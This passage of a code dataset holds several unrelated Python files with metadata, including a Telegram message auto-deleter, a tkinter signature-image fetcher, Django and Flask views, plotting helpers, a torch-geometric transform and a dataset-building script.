sell_buy_signatures = {\n \"#объявление\",\n \"объявление\",\n \"куплю\",\n \"продам\",\n \"отдам\",\n \"продаю\",\n \"покупаю\",\n }\n if any(\n re.search(r\"\\b{}\\b\".format(signature), text_lowercase)\n for signature in sell_buy_signatures\n ):\n return 4 * day\n\n # Потенциально опасные сообщения\n danger_signatures = {\n \"бес\",\n \"алпач\",\n \"алпацкий\",\n \"бессонов\",\n \"офицер\",\n \"деж\",\n \"дежурный\",\n \"ответственный\",\n \"опер\",\n \"оперативный\",\n \"опердеж\",\n \"корпоративный\",\n \"майор\",\n \"полкан\",\n \"полковник\",\n \"майор\",\n \"майорчик\",\n \"капитан\",\n \"прапор\",\n \"прапорщик\",\n \"лейтеха\",\n \"лейтёха\",\n \"лейт\",\n \"лейтенант\",\n\t\t\"офик\",\n\t\t\"воппер\",\n\t\t\"кэп\",\n\t\t\"кэпчик\",\n\t\t\"ген\",\n\t\t\"генерал\"\n }\n if any(\n re.search(r\"\\b{}\\b\".format(signature), text_lowercase)\n for signature in danger_signatures\n ):\n return 15 * minute\n\n # По-умолчанию\n return 2 * hour\n\n\nasync def deletion_task(m):\n to_delete.add(m.id)\n ttl = get_message_ttl(m.message)\n time_passed = (datetime.now(timezone.utc) - m.date).total_seconds()\n actual_ttl = ttl - time_passed if time_passed < ttl else 0\n print(\"deleting\", m.id, \"in\", actual_ttl, \"seconds\")\n await asyncio.sleep(actual_ttl)\n if m.id in to_delete:\n await m.delete()\n to_delete.remove(m.id)\n\n\nasync def remove_older_messages():\n async for m in client.iter_messages(chat_id, ids=list(to_delete)):\n if m is not None:\n asyncio.create_task(deletion_task(m))\n\n\n@client.on(events.NewMessage)\nasync def handler(event):\n print(event)\n if event.chat_id not in { chat_id, channel_id }:\n return\n if event.reply_to_msg_id and event.message.message == \"!save\":\n to_delete.remove(event.reply_to_msg_id)\n await event.message.delete()\n return\n client.loop.create_task(deletion_task(event.message))\n\n\nclient.loop.create_task(remove_older_messages())\n", "sub_path": "src/history_cleaner.py", "file_name": "history_cleaner.py", "file_ext": "py", "file_size_in_byte": 3471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.search", "line_number": 46, "usage_type": "call"}, {"api_name": "re.search", "line_number": 85, "usage_type": "call"}, {"api_name": "persistent.to_delete.add", "line_number": 95, "usage_type": "call"}, {"api_name": "persistent.to_delete", "line_number": 95, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 97, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 97, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 97, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 97, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 100, "usage_type": "call"}, {"api_name": "persistent.to_delete", "line_number": 101, "usage_type": "name"}, {"api_name": "persistent.to_delete.remove", "line_number": 103, "usage_type": "call"}, {"api_name": "persistent.to_delete", "line_number": 103, "usage_type": "name"}, {"api_name": "client.client.iter_messages", "line_number": 107, "usage_type": "call"}, {"api_name": "config.chat_id", "line_number": 107, "usage_type": "argument"}, {"api_name": "client.client", "line_number": 107, "usage_type": "name"}, {"api_name": "persistent.to_delete", "line_number": 107, "usage_type": "argument"}, {"api_name": "asyncio.create_task", "line_number": 109, "usage_type": "call"}, {"api_name": "config.chat_id", "line_number": 115, "usage_type": "name"}, 
{"api_name": "config.channel_id", "line_number": 115, "usage_type": "name"}, {"api_name": "persistent.to_delete.remove", "line_number": 118, "usage_type": "call"}, {"api_name": "persistent.to_delete", "line_number": 118, "usage_type": "name"}, {"api_name": "client.client.loop.create_task", "line_number": 121, "usage_type": "call"}, {"api_name": "client.client.loop", "line_number": 121, "usage_type": "attribute"}, {"api_name": "client.client", "line_number": 121, "usage_type": "name"}, {"api_name": "client.client.on", "line_number": 112, "usage_type": "call"}, {"api_name": "client.client", "line_number": 112, "usage_type": "name"}, {"api_name": "telethon.events.NewMessage", "line_number": 112, "usage_type": "attribute"}, {"api_name": "telethon.events", "line_number": 112, "usage_type": "name"}, {"api_name": "client.client.loop.create_task", "line_number": 124, "usage_type": "call"}, {"api_name": "client.client.loop", "line_number": 124, "usage_type": "attribute"}, {"api_name": "client.client", "line_number": 124, "usage_type": "name"}]} +{"seq_id": "208741396", "text": "from tkinter import *\nfrom tkinter import messagebox\nfrom PIL import Image,ImageTk\nimport requests\nimport re\n\ndef download():\n strat_url = \"http://www.uustv.com/\"\n name = e.get()\n #去空格\n name = name.strip()\n if name == '':\n messagebox.showinfo('提示','请输入用户名')\n else:\n data = {\n 'word':name,\n 'sizes':60,\n 'fonts':'jfcs.ttf',\n 'fontcolor':'#000000'\n }\n result = requests.post(strat_url,data=data)\n result.encoding = 'utf-8'\n html = result.text\n reg = '
<div class=\"tu\">.*?<img src=\"(.*?)\"/></div>
'\n imagepath = re.findall(reg,html)\n #图片的完整路径\n imgurl = strat_url + imagepath[0]\n response = requests.get(imgurl).content\n f = open('{}.gif' .format(name),'wb')\n f.write(response)\n\n\n #显示图片\n bm = ImageTk.PhotoImage(file='{}.gif' .format(name))\n l1 = Label(root,image=bm)\n l1.bm = bm\n l1.grid(row=2,columnspan=2)\n\n\n\n\n\nroot = Tk()\nroot.title(\"签名设计\")\nroot.geometry(\"600x300+500+200\")\n\nl = Label(root,text='签名', font=('华文行楷',20),fg='green')\nl.grid(row=0,column=0)\n\ne = Entry(root,font=('微软雅黑', 20))\ne.grid(row=0, column=1)\n\nb = Button(root,text='设计签名',font=(\"微软雅黑\",20),fg='blue',command=download)\nb.grid(row=1,column=0)\n\n\n\n\nroot.mainloop()", "sub_path": "tkinterproject/test/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 1402, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tkinter.messagebox.showinfo", "line_number": 13, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 13, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 21, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 25, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "447143310", "text": "from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\n\nfrom .forms import NameForm\n\nimport redis\n\nr = redis.StrictRedis(host='localhost', port=6379, db=0)\n\n#Django: working with forms (djangoproject)\ndef get_name(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = NameForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required\n firstname = form.cleaned_data['firstname']\n lastname = form.cleaned_data['lastname']\n url = \"http://api.icndb.com/jokes/random?firstName=\" + firstname + \"&lastName=\" + lastname\n # redirect to a new URL:\n return HttpResponseRedirect('#')\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = NameForm()\n\n return render(request, 'jokesApp/index.html', {'form': form})", "sub_path": "chuck_norris/jokesApp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1054, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "redis.StrictRedis", "line_number": 8, "usage_type": "call"}, {"api_name": "forms.NameForm", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 23, "usage_type": "call"}, {"api_name": "forms.NameForm", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "306325436", "text": "import torch, matplotlib as mpl, seaborn as sns, numpy as np\nimport matplotlib.pyplot as plt, matplotlib.collections as mc\n\ndef _init():\n \"\"\"Default font formatting\"\"\"\n mpl.rc('font', weight='bold', size=36)\n return plt.subplots(figsize=[16,9])\n\ndef _format(ax):\n \"\"\"Default plot formatting\"\"\"\n ax.autoscale()\n plt.xlabel(\"Wire\")\n plt.ylabel(\"Time tick\")\n plt.tight_layout()\n\ndef _get_lines(g, score):\n \"\"\"Take a g object and return a 
list of LineCollection objects, one per class\"\"\"\n # wire = g.x[:,1]\n # time = g.x[:,2]\n wire = g[\"x\"][:,1]\n time = g[\"x\"][:,2]\n # lines = [ [ [ wire[edge[0]], time[edge[0]] ], [ wire[edge[1]], time[edge[1]] ] ] for edge in g.edge_index.T ]\n lines = [ [ [ wire[edge[0]], time[edge[0]] ], [ wire[edge[1]], time[edge[1]] ] ] for edge in g[\"edge_index\"].T ]\n lines_class = [ [], [], [], [] ]\n colours = ['gainsboro', 'red', 'green', 'blue' ]\n for l, y in zip(lines, score): lines_class[y].append(l)\n return [ mc.LineCollection(lines_class[i], colors=colours[i], linewidths=2, zorder=1) for i in range(len(colours)) ]\n\ndef plot_node_score(g, y):\n \"\"\"Plot graph nodes, colour-coded by node label\"\"\"\n fig, ax = _init()\n c = np.array(sns.color_palette())[y]\n plt.scatter(g[\"x\"][:,1], g[\"x\"][:,2], c=c, s=8)\n _format(ax)\n\ndef plot_edge_score(g, y):\n \"\"\"Plot graph edges, colour-coded by edge score\"\"\"\n fig, ax = _init()\n lcs = _get_lines(g, y)\n for lc in lcs: ax.add_collection(lc)\n _format(ax)\n\ndef plot_edge_diff(g, y):\n \"\"\"Plot graph edges, highlighting edges that were misclassified\"\"\"\n fig, ax = _init()\n y = (y != g.y)\n lcs = _get_lines(g, y)\n for lc in lcs: ax.add_collection(lc)\n _format(ax)\n\n", "sub_path": "numl/plot/graph.py", "file_name": "graph.py", "file_ext": "py", "file_size_in_byte": 1662, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.rc", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.collections", "line_number": 27, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "seaborn.color_palette", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "456235087", "text": "import methods2\nimport os\nfrom flask import Flask, request, jsonify\napp = Flask(__name__)\n\nport = 8000\n\n#app.debug = True\n\n\n\n@app.route(\"/<lastname>/<firstname>/<middle>\", methods = ['GET'])\ndef repFunction(lastname, firstname, middle):\n if request.method == 'GET':\n return methods2.getRepFunction(lastname,firstname,middle) \n else: \n return \"Invalid\"\n\n@app.route(\"/account/<gdun>\", methods = ['POST'])\ndef getInstallData(gdun):\n if request.method == 'POST':\n payload = request.get_json()\n return methods2.getInstallData(gdun, payload)\n else:\n return \"Invalid\"\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=port)\n\n\n\n\n\n", "sub_path": "routes2.py", "file_name": "routes2.py", "file_ext": "py", "file_size_in_byte": 652, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", 
"api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "methods2.getRepFunction", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "methods2.getInstallData", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "188049173", "text": "#!/usr/bin/env python\n\nfrom factory.factory import serializer\n\ntypes = {\n \"yaml\": serializer.get_parser(\"yaml\"),\n \"json\": serializer.get_parser(\"json\"),\n}\n\n\ndef dump(in_file, out_file):\n ifile = open(in_file, \"r\")\n ofile = open(out_file, \"w\")\n obj = types[in_file.split(\".\")[-1].lower()].unpack(ifile)\n types[out_file.split(\".\")[-1].lower()].pack(obj, ofile)\n ifile.close()\n ofile.close()\n", "sub_path": "Lab_2/application/dump.py", "file_name": "dump.py", "file_ext": "py", "file_size_in_byte": 413, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "factory.factory.serializer.get_parser", "line_number": 6, "usage_type": "call"}, {"api_name": "factory.factory.serializer", "line_number": 6, "usage_type": "name"}, {"api_name": "factory.factory.serializer.get_parser", "line_number": 7, "usage_type": "call"}, {"api_name": "factory.factory.serializer", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "7673595", "text": "from __future__ import division\n\nfrom math import pi as PI\n\nimport torch\n\n\nclass SphericalAdj(object):\n \"\"\"Concatenates Cartesian spatial relations based on the position\n :math:`P \\in \\mathbb{R}^{N x D}` of graph nodes to the graph's edge\n attributes.\"\"\"\n\n def __call__(self, data):\n\n index = data.index\n row, col = index\n\n # Compute spherical pseudo-coordinates.\n direction = data.pos[col] - data.pos[row]\n rho = (direction * direction).sum(1).sqrt()\n rho /= rho.max()\n theta = torch.atan2(direction[:, 1], direction[:, 0]) / (2 * PI)\n theta += (theta < 0).type_as(theta)\n phi = torch.acos(direction[:, 2]) / PI\n spherical = torch.stack([rho, theta, phi], dim=1)\n\n if data.weight is None:\n data.weight = spherical\n else:\n data.weight = torch.cat(\n [spherical, data.weight.unsqueeze(1)], dim=1)\n\n return data\n", "sub_path": "torch_geometric/transform/spherical.py", "file_name": "spherical.py", "file_ext": "py", "file_size_in_byte": 949, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.atan2", "line_number": 22, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.acos", "line_number": 24, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.stack", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "408205942", "text": "\"\"\"MbKit\"\"\"\n\nfrom setuptools import setup, find_packages\nfrom distutils.util import convert_path\nimport glob\n\ndef get_version():\n # Credits to http://stackoverflow.com/a/24517154\n main_ns = {}\n ver_path = 
convert_path('mbkit/_version.py')\n with open(ver_path) as f_in:\n exec(f_in.read(), main_ns)\n return main_ns['__version__']\n\n# Obtain the current version of ConKit\n__version__ = get_version()\n\n# Do the actual setup below\nsetup(\n name='mbkit',\n description=__doc__.replace(\"\\n\", \"\"),\n long_description=open('README.md').read(),\n version=__version__,\n author='Felix Simkovic, Jens Thomas, Adam Simpkin & Ronan Keegan',\n author_email='felixsimkovic@me.com',\n license='BSD License',\n url='https://github.com/rigdenlab/mbkit',\n download_url='https://github.com/rigdenlab/mbkit/tarball/' + __version__,\n package_dir={'mbkit': 'mbkit'},\n packages=find_packages(exclude=\"tests\"),\n platforms=['Linux', 'Mac OS-X', 'Unix', 'Windows'],\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n ],\n test_suite='nose.collector',\n tests_require=['nose >=1.3.7'],\n include_package_data=True,\n zip_safe=False,\n)\n\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1475, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "distutils.util.convert_path", "line_number": 10, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 19, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "80129732", "text": "#!/usr/bin/env python\nimport os\nimport json\nfrom argparse import ArgumentParser\nfrom python_code.initialization import Initializer\nimport torch\nimport numpy as np\nfrom server import FEATURE_DIM\n\nDEFAULT_DATA_PATH = \"../../images/\"\nFILE_EXTENTIONS = [\"jpg\", \"png\"]\n\nREADME = \"\"\"\\\n1. copy all images into /raw//imgs/\n (please don't use multiple extentions [e.g. 'image.png.jpg'], this has not been tested due to time)\n2. give a+rx rights recursively (`chmod a+rx raw/`)\n3. run this script with a list (subset) of images or use all images in the folder [See EXAMPLES]\n4. 
punch julian to add the script in the node.js-server\n\"\"\"\n\nEXAMPLES = \"\"\"$ python generate_dataset_json.py -n Demo_Wiki_1 -i demo_wiki_1 -r ~/visiexp/datasets -a\n -> Generates a dataset called 'Demo_Wiki_1' with all images in '~/visiexp/datasets/raw/demo_wiki_1/imgs'\n\n $ python generate_dataset_json.py -n Demo_Wiki_2 -i demo_wiki_1 -r ~/visiexp/datasets -f files.txt\n -> Generates a dataset called 'Demo_Wiki_2' with all images listed in 'files.txt' located in '~/visiexp/datasets/raw/demo_wiki_1/imgs'\n \n $ python generate_dataset_json.py -n Demo_Wiki_3 -i demo_wiki_1 -r ~/visiexp/datasets -e bmp -a\n -> Generates a dataset called 'Demo_Wiki_3', using only bmp-files\"\"\"\n\nLABELFILE_EXAMPLE = \"\"\"\\\nCATEGORIES: animal pose color\nsome_wild_bear bear standing brown\ncat_25_06_2003 cat sitting white\nIMG_20190229_235901 wolpertinger flying gray\n# first line defines categories (\"CATEGORIES:\" mandatory!)\n# use as many spaces as you please\n# non-mentioned images won't receive lables\n\"\"\"\n\nparser = ArgumentParser(description=\"Generates server-readable JSON files for new datasets\")\nparser.add_argument(\"--root\", \"-r\", type=str, default=DEFAULT_DATA_PATH, help=\"Root directory of all datasets.\")\nparser.add_argument(\"--name\", \"-n\", type=str, required=True, help=\"Name of the new dataset.\")\nparser.add_argument(\"--idir\", \"-i\", type=str, required=True, help=\"Name of image folder inside `/raw/`.\")\nparser.add_argument(\"--lfile\", \"-l\", type=str, help=\"File that contains labels in categories.\")\nparser.add_argument(\"--extentions\", \"-e\", type=str, nargs=\"+\", default=FILE_EXTENTIONS, help=\"Possible image extentions. Default: {}\".format(FILE_EXTENTIONS))\nparser_input = parser.add_mutually_exclusive_group(required=True)\nparser_input.add_argument(\"--data\", \"-d\", type=str, nargs=\"+\", help=\"List of names of all data images to be processed. Preceding paths are ignored for easier auto-completion. Conflicts with `-f`, `-a`.\")\nparser_input.add_argument(\"--file\", \"-f\", type=str, nargs=\"?\", help=\"File that contains the names of all data images to be processed. Currently only method to add labels. Conflicts with `-d`, `-a`.\")\nparser_input.add_argument(\"--all\", \"-a\", action=\"store_true\", help=\"Use all files in image folder. 
Conflicts with `-d`, `-f`.\")\nparser.add_argument(\"--silent\", \"-s\", action=\"store_true\", help=\"Don't be verbose.\")\nparser.add_argument(\"--device\", \"-x\", type=int, default=0, help=\"CUDA device to use\")\n\ndef default(obj):\n if type(obj).__module__ == np.__name__:\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return obj.item()\n raise TypeError('Unknown type:', type(obj))\n\ndef probe_image_file(name, idir):\n if any(name.endswith(\".\" + ext) for ext in args.extentions):\n # if extention is given, only test given extention\n if os.path.isfile(os.path.join(idir, name)):\n return name\n else:\n # else, try all possible extention\n for ext in args.extentions:\n tmp = os.path.join(idir, name + \".\" + ext)\n if os.path.isfile(tmp):\n return name\n return None\n\ndef clean_exts(inp_l):\n res = []\n for item in inp_l:\n if any(item.endswith(\".\" + ext) for ext in args.extentions):\n res.append(item.rsplit(\".\", 1)[0])\n else:\n res.append(item)\n return res\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n # with torch.cuda.device(args.device):\n if True:\n json_path = os.path.abspath(os.path.join(__file__, DEFAULT_DATA_PATH, 'init_json', f'{args.name}.json'))\n if os.path.exists(json_path):\n raise IOError(\"JSON for `{}` already exists.\".format(args.name))\n\n imdir = os.path.abspath(os.path.join(__file__, f'{args.root}{args.idir}'))\n if not os.path.isdir(imdir):\n raise IOError(\"The path `{}` does not exist or is not a directory.\".format(imdir))\n\n # check input data\n if not args.silent: print(\"### Checking Files ###\")\n if args.data is not None:\n data = [os.path.split(x)[1] for x in args.data]\n elif args.file is not None:\n data = [x.strip() for x in open(args.file, 'r')]\n elif args.all is True:\n data = os.listdir(imdir)\n else:\n assert False, \"This should not be happening!\"\n data = sorted(data)\n # error, if files missing\n files = [probe_image_file(f, imdir) for f in data]\n if None in files:\n fail = \"; \".join([data[i] for i,b in enumerate(files) if b is None])\n raise IOError(\"The following data could not be found: {}\".format(fail))\n data = clean_exts(data)\n\n # generate nodes-part for json\n nodes = {name:{'label': '', 'labels': [], 'idx':i, 'x':0, 'y':0} for i, name in enumerate(data)}\n # ^-- this is needed by the Initializer (probably legacy)\n\n # assign labels, if given\n if args.lfile is not None:\n if not args.silent: print(\"### Assigning Labels ###\")\n if not os.path.isfile(args.lfile):\n raise IOError(\"The label file could not be found: {}\".format(args.lfile))\n labelfile = open(args.lfile, 'r')\n first_line = labelfile.readline().split()\n if first_line[0] != \"CATEGORIES:\":\n raise IOError(\"The label file has wrong formatting.\")\n if not first_line[1:]:\n raise IOError(\"The label file has no categories.\")\n categories = first_line[1:]\n for i, line in enumerate(labelfile, 1):\n line = line.split()\n if len(line) != len(categories) + 1:\n raise IOError(\"The label file has the wrong amount of labels in line {}\".format(i))\n img, lables = line[0], line[1:]\n if img not in nodes:\n raise IOError(\"Unknown image id in label file: {}\".format(img))\n nodes[img]['labels'] = lables\n else:\n categories = None\n\n try:\n # generate temporary json to call Initializer\n if not args.silent: print(\"### Generating temporary JSON ###\")\n out = {'im_dir_name': args.idir, 'nodes': nodes, 'temporary': True}\n json.dump(out, open(os.path.abspath(os.path.join(__file__, f'{args.root}{args.name}.json')), 
\"w\"))\n\n # generate additional resources with Initializer\n if not args.silent: print(\"### Loading Initializer ###\")\n dot_extentions = [\".\" + e for e in args.extentions] + [\"\"]\n init = Initializer(args.name, impath=imdir, info_file=json_path, outdir=args.root, feature_dim=FEATURE_DIM,\n data_extensions=dot_extentions, verbose=True)\n init.initialize(raw_features=True)\n proj = init.make_projection_dict()\n\n # store real JSON with projections\n if not args.silent: print(\"### Generating final JSON ###\")\n for i in range(len(proj['image_id'])):\n for ext in dot_extentions:\n try:\n nodes[proj['image_id'][i] + ext]['x'] = proj['projection'][i][0]\n nodes[proj['image_id'][i] + ext]['y'] = proj['projection'][i][1]\n except KeyError:\n pass\n else: # break, if key worked\n break\n else:\n raise IOError(\"No extention worked for {}\".format(proj['image_id'][i])) # (this should not be happening)\n out = {'im_dir_name': args.idir, 'nodes': nodes}\n if categories is not None:\n out['categories'] = categories\n except:\n if not args.silent: print(\"!#! An error occured, deleting temp files !#!\")\n if os.path.isfile(json_path):\n os.remove(json_path)\n path = os.path.join(args.root, \"norm\", \"{}_mean_std.pkl\")\n if os.path.isfile(path):\n os.remove(path)\n path = os.path.join(args.root, \"features\", \"{}_512.h5\")\n if os.path.isfile(path):\n os.remove(path)\n path = os.path.join(args.root, \"features\", \"{}_512_PCA.h5\")\n if os.path.isfile(path):\n os.remove(path)\n raise\n # sort the node keys to be equal to the sorted image list\n out['nodes'] = sorted(out['nodes'].items())\n out['nodes'] = {x[0]: x[1] for x in out['nodes']}\n json.dump(out, open(json_path, \"w\"), default=default, indent=4)\n", "sub_path": "python_code/generate_dataset_json.py", "file_name": "generate_dataset_json.py", "file_ext": "py", "file_size_in_byte": 9228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.__name__", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 
99, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 145, "usage_type": "call"}, {"api_name": "python_code.initialization.Initializer", "line_number": 150, "usage_type": "call"}, {"api_name": "server.FEATURE_DIM", "line_number": 150, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 175, "usage_type": "call"}, {"api_name": "os.path", "line_number": 175, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path", "line_number": 182, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 183, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 188, "usage_type": "call"}]} +{"seq_id": "28471017", "text": "import sys\n\nfrom collections import namedtuple\n\n\nthis_module = sys.modules[__name__]\n\ndef _add_namedtuple_in_this_module(name, attribute_names):\n new_nametuple = namedtuple(name, attribute_names)\n setattr(this_module, name, new_nametuple)\n\nfor name, attrs in (\n ('RawVectors' , 'event pmtrwf sipmrwf pmt_active sipm_active'),\n ('SensorParams' , 'NPMT PMTWL NSIPM SIPMWL'),\n ('CalibParams' , 'coeff_c, coeff_blr, adc_to_pes_pmt adc_to_pes_sipm'),\n ('DeconvParams' , 'n_baseline thr_trigger'),\n ('CalibVectors' , 'channel_id coeff_blr coeff_c adc_to_pes adc_to_pes_sipm pmt_active'),\n ('S12Params' , 'tmin tmax stride lmin lmax rebin'),\n ('PmapParams' ,'s1_params s2_params s1p_params s1_PMT_params s1p_PMT_params'),\n ('ThresholdParams', 'thr_s1 thr_s2 thr_MAU thr_sipm thr_SIPM'),\n ('CalibratedSum' , 'csum csum_mau'),\n ('CalibratedPMT' , 'CPMT CPMT_mau'),\n ('S1PMaps' , 'S1 S1_PMT S1p S1p_PMT'),\n ('PMaps' , 'S1 S2 S2Si'),\n ('Peak' , 't E'),\n ('FitFunction' , 'fn values errors chi2 pvalue'),\n ('Cluster' , 'Q pos rms Nsipm'),\n ('Measurement' , 'value uncertainty')):\n _add_namedtuple_in_this_module(name, attrs)\n\n# Leave nothing but the namedtuple types in the namespace of this module\ndel name, namedtuple, sys, this_module, _add_namedtuple_in_this_module\n", "sub_path": "invisible_cities/reco/params.py", "file_name": "params.py", "file_ext": "py", "file_size_in_byte": 1442, "program_lang": "python", "lang": 
